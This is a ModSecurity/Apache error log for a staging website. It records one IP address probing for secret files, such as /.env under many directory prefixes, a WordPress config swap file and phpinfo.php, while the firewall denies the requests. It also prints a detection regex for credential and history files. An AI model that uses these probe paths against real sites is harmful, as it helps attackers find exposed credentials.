[Tue May 26 15:30:48.050698 2026] [security2:error] [pid 715645:tid 715695] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVvUHVGgMGh8k213RgLtwAAPjE"]
[Tue May 26 15:30:48.078104 2026] [autoindex:error] [pid 715645:tid 715817] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/moesartc/public_html/unsobered.com/staging/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:48.104954 2026] [security2:error] [pid 715645:tid 715753] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/ADMIN/.env"] [unique_id "ahVvUHVGgMGh8k213RgL0gAAPms"]
[Tue May 26 15:30:48.106478 2026] [security2:error] [pid 715645:tid 715875] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLzQAAAGQ"]
[Tue May 26 15:30:48.107101 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLrwAAPhw"]
[Tue May 26 15:30:48.108307 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLygAAAA8"]
[Tue May 26 15:30:48.111884 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLxQAAACw"]
[Tue May 26 15:30:48.112475 2026] [security2:error] [pid 715645:tid 715840] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLxwAAAEE"]
[Tue May 26 15:30:48.114255 2026] [security2:error] [pid 715645:tid 715841] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLzAAAAEI"]
[Tue May 26 15:30:48.117312 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLyQAAAHU"]
[Tue May 26 15:30:48.118488 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLywAAADc"]
[Tue May 26 15:30:48.120822 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL0AAAABU"]
[Tue May 26 15:30:48.121818 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLzwAAAFA"]
[Tue May 26 15:30:48.123577 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgLxgAAAFI"]
[Tue May 26 15:30:48.234154 2026] [security2:error] [pid 715645:tid 715678] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/API/.env"] [unique_id "ahVvUHVGgMGh8k213RgL3gAAQyA"]
[Tue May 26 15:30:48.251250 2026] [security2:error] [pid 715645:tid 715776] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL3QAAAAE"]
[Tue May 26 15:30:48.275278 2026] [security2:error] [pid 715645:tid 715759] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/APP/.env"] [unique_id "ahVvUHVGgMGh8k213RgL5QAAQ3E"]
[Tue May 26 15:30:48.276104 2026] [security2:error] [pid 715645:tid 715726] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/BACKEND/.env"] [unique_id "ahVvUHVGgMGh8k213RgL5wAAQ1A"]
[Tue May 26 15:30:48.276146 2026] [security2:error] [pid 715645:tid 715687] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/BE/.env"] [unique_id "ahVvUHVGgMGh8k213RgL6AAAQyk"]
[Tue May 26 15:30:48.276208 2026] [security2:error] [pid 715645:tid 715693] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/BACK/.env"] [unique_id "ahVvUHVGgMGh8k213RgL5gAAQy8"]
[Tue May 26 15:30:48.277239 2026] [security2:error] [pid 715645:tid 715683] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/Api/.env"] [unique_id "ahVvUHVGgMGh8k213RgL6QAAQyU"]
[Tue May 26 15:30:48.277898 2026] [security2:error] [pid 715645:tid 715676] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/Backend/.env"] [unique_id "ahVvUHVGgMGh8k213RgL6wAAQx4"]
[Tue May 26 15:30:48.293664 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL3wAAQ2w"]
[Tue May 26 15:30:48.295738 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL4AAAQxA"]
[Tue May 26 15:30:48.300893 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL4QAAQxE"]
[Tue May 26 15:30:48.301279 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL4gAAQ1s"]
[Tue May 26 15:30:48.311578 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL4wAAQx0"]
[Tue May 26 15:30:48.313087 2026] [security2:error] [pid 715645:tid 715665] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/Be/.env"] [unique_id "ahVvUHVGgMGh8k213RgL7AAAQxM"]
[Tue May 26 15:30:48.321503 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL5AAAQy4"]
[Tue May 26 15:30:48.331110 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL6gAAQw8"]
[Tue May 26 15:30:48.447615 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL9wAAAB4"]
[Tue May 26 15:30:48.453484 2026] [security2:error] [pid 715645:tid 715779] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgL-AAAAAQ"]
[Tue May 26 15:30:48.477812 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMBgAAAGo"]
[Tue May 26 15:30:48.477826 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMBQAAAE8"]
[Tue May 26 15:30:48.479755 2026] [security2:error] [pid 715645:tid 715899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMBwAAAHw"]
[Tue May 26 15:30:48.481317 2026] [security2:error] [pid 715645:tid 715807] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMCAAAACA"]
[Tue May 26 15:30:48.485838 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMCgAAAEc"]
[Tue May 26 15:30:48.499242 2026] [security2:error] [pid 715645:tid 715787] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMCQAAAAw"]
[Tue May 26 15:30:48.507004 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMFQAAABQ"]
[Tue May 26 15:30:48.510139 2026] [security2:error] [pid 715645:tid 715845] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMFgAAAEY"]
[Tue May 26 15:30:48.512767 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMGQAAABo"]
[Tue May 26 15:30:48.515341 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMFwAAAC4"]
[Tue May 26 15:30:48.517909 2026] [security2:error] [pid 715645:tid 715863] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMHAAAAFg"]
[Tue May 26 15:30:48.525551 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMHwAAADI"]
[Tue May 26 15:30:48.529691 2026] [security2:error] [pid 715645:tid 715775] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMIQAAAAA"]
[Tue May 26 15:30:48.536530 2026] [security2:error] [pid 715645:tid 715777] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMIgAAAAI"]
[Tue May 26 15:30:48.650166 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMKgAAAFQ"]
[Tue May 26 15:30:48.655178 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMKwAAAGI"]
[Tue May 26 15:30:48.658953 2026] [security2:error] [pid 715645:tid 715651] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVvUHVGgMGh8k213RgMOQAAaQU"]
[Tue May 26 15:30:48.680379 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMLgAAaVE"]
[Tue May 26 15:30:48.692955 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMLwAAaSY"]
[Tue May 26 15:30:48.696356 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMMwAAADg"]
[Tue May 26 15:30:48.698364 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMMQAAaSQ"]
[Tue May 26 15:30:48.698488 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMNAAAACs"]
[Tue May 26 15:30:48.703286 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMOAAAACI"]
[Tue May 26 15:30:48.715560 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMPgAAABc"]
[Tue May 26 15:30:48.721020 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMPwAAADo"]
[Tue May 26 15:30:48.726520 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMQgAAABM"]
[Tue May 26 15:30:48.737642 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMSgAAABE"]
[Tue May 26 15:30:48.739495 2026] [security2:error] [pid 715645:tid 715779] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMTAAAAAQ"]
[Tue May 26 15:30:48.744136 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMSwAAAD8"]
[Tue May 26 15:30:48.752773 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMTQAAAE8"]
[Tue May 26 15:30:48.802592 2026] [security2:error] [pid 715645:tid 715766] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/admin-app/.env"] [unique_id "ahVvUHVGgMGh8k213RgMUwAAZng"]
